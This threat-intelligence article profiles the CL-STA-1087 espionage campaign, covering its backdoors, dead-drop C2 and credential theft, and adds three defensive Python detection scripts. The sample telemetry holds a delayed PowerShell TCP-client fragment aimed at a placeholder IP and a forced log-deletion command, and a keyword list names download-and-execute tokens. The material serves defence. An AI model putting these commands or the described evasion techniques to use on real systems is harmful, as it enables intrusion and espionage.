Government agencies and military organizations across Southeast Asia have become the focus of a long-running, highly targeted cyber espionage campaign that has likely been active since at least 2020. According to threat intelligence from Palo Alto Networks Unit 42, the activity cluster, tracked as CL‑STA‑1087 (where “STA” denotes state-aligned), is assessed to be linked to interests in China and is primarily aimed at gathering sensitive military intelligence.
Targeted cyber espionage against defense and government networks
Unit 42 analysts observe that CL‑STA‑1087 exhibits behavior typical of advanced persistent threat (APT) operations: strict operational discipline, a strong focus on stealth, and the ability to maintain access to victim environments for extended periods. Rather than indiscriminately exfiltrating all accessible data, the operators concentrate on high-value military and strategic information.
The group’s collection priorities include documents describing military capabilities, command structures, and cooperation with Western armed forces. Of particular interest are materials related to C4I systems (Command, Control, Communications, Computers & Intelligence) — the digital backbone that underpins modern command-and-control, secure communications, and battlefield awareness.
Public threat reports from organizations such as Verizon and Mandiant consistently show that defense and public sector entities are among the most frequently targeted by nation-state actors. CL‑STA‑1087 fits this pattern, demonstrating a shift from one-off, noisy intrusions to quiet, sustained espionage designed to yield long-term strategic advantage.
Advanced toolset: AppleChris, MemFun and Getpass malware
AppleChris backdoor: DLL hijacking and Pastebin-based C2 discovery
One of the primary tools in this campaign is the AppleChris backdoor. It is deployed using DLL hijacking, a technique in which a malicious dynamic link library (DLL) is placed where a legitimate application will unknowingly load it. This allows the malware to execute within a trusted process, significantly complicating detection.
AppleChris employs a dead drop resolver strategy to locate its command-and-control (C2) servers. Instead of contacting a hard-coded C2 address, it retrieves Base64-encoded data from Pastebin, which contains the current C2 endpoint. Some variants also query Dropbox for the same information, using Pastebin as a fallback channel. Public posts used in this mechanism date back to at least September 2020, indicating a durable and well-maintained infrastructure.
Once connected, AppleChris provides full remote administration capabilities, including file system browsing, file upload/download, data deletion, process execution, and remote command shell access. Newer versions add enhanced network proxying features, allowing attackers to tunnel traffic and mask their operations through compromised hosts.
To evade automated analysis and sandboxing, some AppleChris samples implement execution delays, sleeping for up to 30 seconds in EXE form and up to 120 seconds for DLLs. Because many sandboxes observe behavior only for a short window, such delays can allow the malware to remain undetected during initial scans.
MemFun: modular in-memory backdoor platform
The second major component of CL‑STA‑1087’s arsenal is MemFun, a more flexible and modular platform than AppleChris. MemFun uses a multi-stage loading chain: an initial loader injects shellcode, which then runs in memory, retrieves C2 configuration from Pastebin, establishes a connection, and downloads a DLL module that acts as the main backdoor.
Because the primary DLL is loaded dynamically at runtime, attackers can change or upgrade payloads without modifying the initial loader, effectively turning MemFun into a generic delivery framework. This approach hinders static analysis and weakens traditional signature-based detection.
MemFun also incorporates anti-forensic techniques. Its dropper aligns its file timestamp with the creation date of the Windows system directory to blend into the environment. It then uses process hollowing against the legitimate dllhost.exe process, replacing its memory with malicious code while retaining the original process name and metadata. This memory-resident execution leaves minimal traces on disk and makes investigation more difficult.
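The timestamp alignment described above can be turned around into a simple detection: executables in user-writable locations rarely carry exactly the same timestamp as the Windows system directory, so an exact match is worth a look. The following Python script is an added example for this article, not Unit 42 tooling or MemFun code. It assumes a scan over directories you choose, uses the file modification time as the comparison field (creation time is not settable portably from Python), and builds a constructed layout in a temporary directory so it runs offline.

```python
import os
import tempfile
import time

# A file whose modification time lands within this many seconds of the system
# directory's timestamp counts as a match; widen if your tooling rounds timestamps.
TOLERANCE_SECONDS = 2
EXECUTABLE_SUFFIXES = (".exe", ".dll")


def system_dir_reference_time(system_dir):
    """Best available 'creation' timestamp for the system directory.

    On Windows st_ctime is the creation time; on POSIX it is the inode change
    time, so the earlier of st_ctime and st_mtime is used as the anchor.
    """
    st = os.stat(system_dir)
    return min(st.st_ctime, st.st_mtime)


def find_timestamp_matches(scan_dirs, reference_ts, tolerance=TOLERANCE_SECONDS):
    """Return executables under scan_dirs whose mtime matches reference_ts."""
    hits = []
    for top in scan_dirs:
        for root, _dirs, files in os.walk(top):
            for name in files:
                if not name.lower().endswith(EXECUTABLE_SUFFIXES):
                    continue
                path = os.path.join(root, name)
                if abs(os.stat(path).st_mtime - reference_ts) <= tolerance:
                    hits.append(path)
    return sorted(hits)


def demo():
    """Constructed layout (assumption, not real forensic data): an old 'Windows'
    directory, one DLL whose timestamp was aligned to it (the dropper pattern)
    and one DLL with a current timestamp. Returns the base names flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        sysdir = os.path.join(tmp, "Windows")
        userdir = os.path.join(tmp, "Users", "alice", "AppData", "Roaming", "Vendor")
        os.makedirs(sysdir)
        os.makedirs(userdir)
        five_years_ago = time.time() - 5 * 365 * 86400
        os.utime(sysdir, (five_years_ago, five_years_ago))
        for name, ts in (("dropper.dll", five_years_ago), ("updater.dll", time.time())):
            path = os.path.join(userdir, name)
            with open(path, "wb") as fh:
                fh.write(b"MZ")  # placeholder header, not a real PE
            os.utime(path, (ts, ts))
        reference = system_dir_reference_time(sysdir)
        matches = find_timestamp_matches([os.path.join(tmp, "Users")], reference)
        return [os.path.basename(m) for m in matches]


if __name__ == "__main__":
    print(demo())
```

On a live Windows host, point the reference at C:\Windows and scan profile and temp directories; treat a hit as a lead rather than a verdict, and confirm against the $FILE_NAME timestamps in the MFT, which are harder to alter than the values reported by the standard file API.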
Getpass: credential theft for lateral movement
To expand their foothold and escalate privileges, the attackers deploy Getpass, a customized variant of the well-known credential theft tool Mimikatz. Getpass extracts plaintext passwords, NTLM hashes, and other authentication artifacts directly from the memory of the Windows lsass.exe process.
Without adequate protection of LSASS (such as virtualization-based isolation or strict access controls), this technique enables rapid compromise of privileged accounts and supports extensive lateral movement across sensitive government and defense networks.
Tactics: stealthy PowerShell, “sleeping” sessions and lateral movement
The CL‑STA‑1087 operation came to light after defenders detected a suspicious PowerShell invocation that slept for six hours before initiating a reverse shell to a C2 server. This behavior illustrates the group’s focus on operational patience: delaying activity to avoid triggering monitoring tools that focus on newly started processes.
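The six-hour sleep is the kind of signal that script block logging plus process-level network telemetry can surface. The detection below is an added example written for this article, not a Unit 42 rule. It assumes PowerShell Operational Event ID 4104 script blocks and Sysmon Event ID 3 network connections have been collected into the two small record types shown; the thresholds, the network-keyword list and all sample events are constructed for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Sleeps of an hour or more before any other action are rare in admin scripts; tune per environment.
LONG_SLEEP_SECONDS = 3600
# Lower-case tokens that suggest a script talks to the network after its delay.
NETWORK_HINTS = ("net.sockets.tcpclient", "webclient", "downloadstring",
                 "invoke-expression", "iex ", "invoke-webrequest")

# (regex, divisor that converts the captured number to seconds)
SLEEP_PATTERNS = (
    (re.compile(r"Start-Sleep\s+(?:-Seconds|-s)\s+(\d+)", re.I), 1),
    (re.compile(r"Start-Sleep\s+(?:-Milliseconds|-m)\s+(\d+)", re.I), 1000),
    (re.compile(r"Thread\]::Sleep\(\s*(\d+)\s*\)", re.I), 1000),
)


def max_sleep_seconds(script_text):
    """Longest single sleep found in a script block, in seconds (0 if none)."""
    longest = 0.0
    for pattern, divisor in SLEEP_PATTERNS:
        for m in pattern.finditer(script_text):
            longest = max(longest, int(m.group(1)) / divisor)
    return longest


@dataclass
class ScriptBlockEvent:
    """Subset of PowerShell Operational Event ID 4104 fields."""
    time: datetime
    process_id: int
    script_text: str


@dataclass
class NetworkEvent:
    """Subset of Sysmon Event ID 3 fields."""
    time: datetime
    process_id: int
    image: str
    dest_ip: str
    dest_port: int


def detect_delayed_beacons(script_events, net_events, min_sleep=LONG_SLEEP_SECONDS):
    """Flag script blocks with a long sleep; raise severity when the script
    references network objects or the same process connects out after the delay."""
    findings = []
    for sb in script_events:
        sleep = max_sleep_seconds(sb.script_text)
        if sleep < min_sleep:
            continue
        text = sb.script_text.lower()
        net_hint = any(h in text for h in NETWORK_HINTS)
        # Window in which a connection from the same PID would follow the sleep.
        earliest = sb.time + timedelta(seconds=sleep * 0.9)
        latest = sb.time + timedelta(seconds=sleep * 1.5 + 300)
        connections = [n for n in net_events
                       if n.process_id == sb.process_id and earliest <= n.time <= latest]
        findings.append({
            "time": sb.time,
            "process_id": sb.process_id,
            "sleep_seconds": sleep,
            "network_hint": net_hint,
            "connections": [f"{n.dest_ip}:{n.dest_port}" for n in connections],
            "severity": "high" if (net_hint or connections) else "medium",
        })
    return findings


# Constructed sample telemetry (not real events from the campaign).
T0 = datetime(2024, 3, 4, 9, 0, 0)
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_SCRIPT_EVENTS = [
    ScriptBlockEvent(T0, 4812,
                     "Start-Sleep -Seconds 21600; $client = New-Object Net.Sockets.TCPClient('203.0.113.10', 443)"),
    ScriptBlockEvent(T0 + timedelta(minutes=5), 5120,
                     "Start-Sleep -Seconds 5; Get-Service | Where-Object Status -eq 'Running'"),
    ScriptBlockEvent(T0 + timedelta(minutes=10), 6001,
                     "Start-Sleep -Seconds 7200; Get-ChildItem C:\\Logs | Remove-Item -Force"),
]
SAMPLE_NETWORK_EVENTS = [
    NetworkEvent(T0 + timedelta(hours=6, seconds=2), 4812, POWERSHELL, "203.0.113.10", 443),
    NetworkEvent(T0 + timedelta(minutes=6), 5120, POWERSHELL, "10.0.0.5", 445),
]

if __name__ == "__main__":
    for finding in detect_delayed_beacons(SAMPLE_SCRIPT_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(finding)
```

The correlation window is deliberately generous (0.9x to 1.5x the sleep plus five minutes) because real scripts often chain several delays; a medium finding with no network activity is typically a scheduled maintenance job, while a high finding warrants pulling the full script block and the parent process chain.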
While the initial access vector has not been conclusively identified, post-compromise activity is well-defined. The operators deploy various versions of AppleChris across multiple hosts to establish redundancy and conduct lateral movement. File searches on infected systems reveal an emphasis on official meeting records, joint exercises, readiness assessments, and analytical reports on cooperation with Western militaries.
Impact on C4I security and practical defense measures
For Southeast Asian defense and government organizations, CL‑STA‑1087 underscores the strategic importance of securing C4I systems and adjacent IT infrastructure. Unauthorized access to plans for exercises, command hierarchies, and allied cooperation can directly affect national security and regional stability.
Effective countermeasures should prioritize hardening administrative tools such as PowerShell (e.g., AppLocker policies, Constrained Language Mode), deploying endpoint detection and response (EDR) solutions with behavioral analytics, and monitoring unusual access to public paste services and cloud storage platforms like Pastebin and Dropbox that may be used for C2 discovery.
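Monitoring paste services and cloud storage for dead-drop lookups, as recommended above and as used by AppleChris and MemFun to find their C2 endpoints, can start from ordinary proxy logs. The script below is an added example for this article, not Unit 42 or product code. It assumes a simple space-separated proxy log format (timestamp, source IP, method, URL, status, bytes, quoted user agent), a constructed list of server-segment prefixes, and constructed sample lines and paste content; the Base64 decoder shows how a captured paste body can be checked for a host:port or URL shaped payload.

```python
import base64
import re

# Services the article names as dead-drop channels; extend from your own traffic.
DEAD_DROP_HOSTS = {
    "pastebin.com", "www.dropbox.com", "dl.dropboxusercontent.com",
    "api.dropboxapi.com", "content.dropboxapi.com",
}
RAW_PASTE = re.compile(r"^https?://pastebin\.com/raw/", re.I)
# Something that decodes to an IP or hostname, optional port, optional path.
ENDPOINT_RE = re.compile(
    r"^(?:https?://)?(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9.-]+\.[a-z]{2,})(?::\d{1,5})?(?:/\S*)?$", re.I)
# Assumed log layout (constructed for this example): ts src method url status bytes "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) (?P<bytes>\d+) "(?P<ua>[^"]*)"$')


def parse_line(line):
    """Parse one proxy log line into a dict, or return None if it does not fit the layout."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["bytes"] = int(entry["bytes"])
    entry["host"] = re.sub(r"^https?://", "", entry["url"]).split("/")[0].split(":")[0].lower()
    return entry


def looks_like_browser(user_agent):
    """Crude check: interactive browsers identify as Mozilla/...; many tools send nothing."""
    return user_agent.startswith("Mozilla/")


def decode_dead_drop(body):
    """Base64-decode a fetched paste; return the endpoint if it looks like host:port or a URL."""
    try:
        text = base64.b64decode(body.strip(), validate=True).decode("ascii").strip()
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    return text if ENDPOINT_RE.match(text) else None


def flag_dead_drop_lookups(lines, server_prefixes=("10.20.",)):
    """Return requests to dead-drop hosts that carry at least one suspicious trait."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or entry["host"] not in DEAD_DROP_HOSTS:
            continue
        reasons = []
        if not looks_like_browser(entry["ua"]):
            reasons.append("non-browser user agent")
        if RAW_PASTE.match(entry["url"]):
            reasons.append("raw paste fetch")
        if any(entry["src"].startswith(p) for p in server_prefixes):
            reasons.append("request from server segment")
        if reasons:
            findings.append({"src": entry["src"], "url": entry["url"], "reasons": reasons})
    return findings


# Constructed sample data (paste ids, paths and addresses are placeholders, not campaign IoCs).
SAMPLE_PROXY_LOG = [
    '2024-03-04T09:02:11Z 10.20.1.15 GET https://pastebin.com/raw/EXAMPLE01 200 44 ""',
    '2024-03-04T09:02:40Z 10.50.3.8 GET https://pastebin.com/u/someuser 200 13420 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-03-04T09:03:05Z 10.20.1.15 GET https://dl.dropboxusercontent.com/s/abc123/config.txt 200 44 "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '2024-03-04T09:04:00Z 10.50.3.9 GET https://www.example.org/news 200 5123 "Mozilla/5.0"',
]
SAMPLE_PASTE_BODY = base64.b64encode(b"203.0.113.25:8443").decode()  # constructed

if __name__ == "__main__":
    for finding in flag_dead_drop_lookups(SAMPLE_PROXY_LOG):
        print(finding)
    print("decoded dead drop:", decode_dead_drop(SAMPLE_PASTE_BODY))
```

Servers and domain controllers have no business fetching pastes at all, so the source-segment rule alone is high-signal there; on workstation segments, combine the user-agent and raw-fetch traits with a frequency baseline, since a small number of hosts polling the same paste on a schedule is the pattern a dead-drop resolver produces.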
Defenders should also strengthen credential protection by enabling technologies such as Credential Guard, isolating LSASS secrets, and restricting access to sensitive processes. Regular penetration testing and red-team exercises modeled on APT techniques, network segmentation, enforcement of least-privilege access, and continuous monitoring of anomalous access to sensitive military documents are critical to reducing exposure.
CL‑STA‑1087 highlights that modern cyber espionage is often a slow, methodical, and deliberately low-profile effort to embed within critical networks over months or years. Organizations in the defense and public sectors should assume persistent interest from state-aligned actors and adjust their monitoring, incident response, and staff training accordingly. Proactively building resilience against APT tradecraft today greatly increases the likelihood of detecting and disrupting similar long-term operations before they can erode strategic and operational advantage.